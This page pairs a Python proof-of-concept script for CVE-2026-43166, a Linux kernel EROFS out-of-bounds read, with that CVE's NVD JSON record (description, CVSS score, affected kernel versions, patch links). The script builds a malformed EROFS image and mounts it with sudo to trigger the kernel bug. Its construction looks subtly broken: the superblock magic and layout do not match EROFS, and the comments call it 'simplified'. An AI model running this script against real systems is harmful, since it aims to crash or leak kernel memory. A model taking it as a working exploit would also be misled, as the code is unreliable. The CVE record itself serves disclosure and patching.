CVE-2026-43166

#!/usr/bin/env python3 # PoC for CVE-2026-43166: EROFS Out-of-Bounds Read # This script creates a crafted EROFS image with unaligned extents # to trigger the vulnerability in z_erofs_transform_plain(). import os import struct IMG_FILE = "crafted_erofs.img" MOUNT_POINT = "/mnt/erofs_test" def create_crafted_image(): """ Creates a minimal EROFS image header with malformed extent data. Real exploitation requires precise binary layout. """ with open(IMG_FILE, "wb") as f: # Write EROFS superblock (simplified) # Magic: EROFS... f.write(b'\xE0\xF5\xE0\xE2' + b'\x00' * 124) # Write a crafted inode with unaligned physical length # This simulates the condition found by syzbot inode_data = struct.pack('<I', 0x1000) # Start aligned inode_data += struct.pack('<I', 0x123) # Physical length UNALIGNED (Trigger) f.write(inode_data) # Padding to reach the extent area f.write(b'\x00' * 4096) print(f"[+] Crafted image created at {IMG_FILE}") def trigger_vulnerability(): """ Attempts to mount the crafted image to trigger the kernel bug. Requires root privileges. """ if not os.path.exists(MOUNT_POINT): os.makedirs(MOUNT_POINT) print(f"[*] Attempting to mount {IMG_FILE}...") # The mount operation triggers the parsing of the crafted extent os.system(f"sudo mount -t erofs -o loop {IMG_FILE} {MOUNT_POINT}") print("[*] If kernel crashes or logs OOB read, vulnerability triggered.") if __name__ == "__main__": create_crafted_image() trigger_vulnerability()

{"cve": {"id": "CVE-2026-43166", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:34.800", "lastModified": "2026-05-13T21:18:46.137", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nerofs: fix interlaced plain identification for encoded extents\n\nOnly plain data whose start position and on-disk physical length are\nboth aligned to the block size should be classified as interlaced\nplain extents. Otherwise, it must be treated as shifted plain extents.\n\nThis issue was found by syzbot using a crafted compressed image\ncontaining plain extents with unaligned physical lengths, which can\ncause OOB read in z_erofs_transform_plain()."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.15", "versionEndExcluding": "6.18.16", "matchCriteriaId": "5B5F989F-E891-48E4-9EC9-3C5EFD3DB9DC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/4a2d046e4b13202a6301a993961f5b30ae4d7119", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9d5a97bc71ed5783687705c708454c4453aa91d1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d3790f26d38606f020212486359b84632c19d08b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}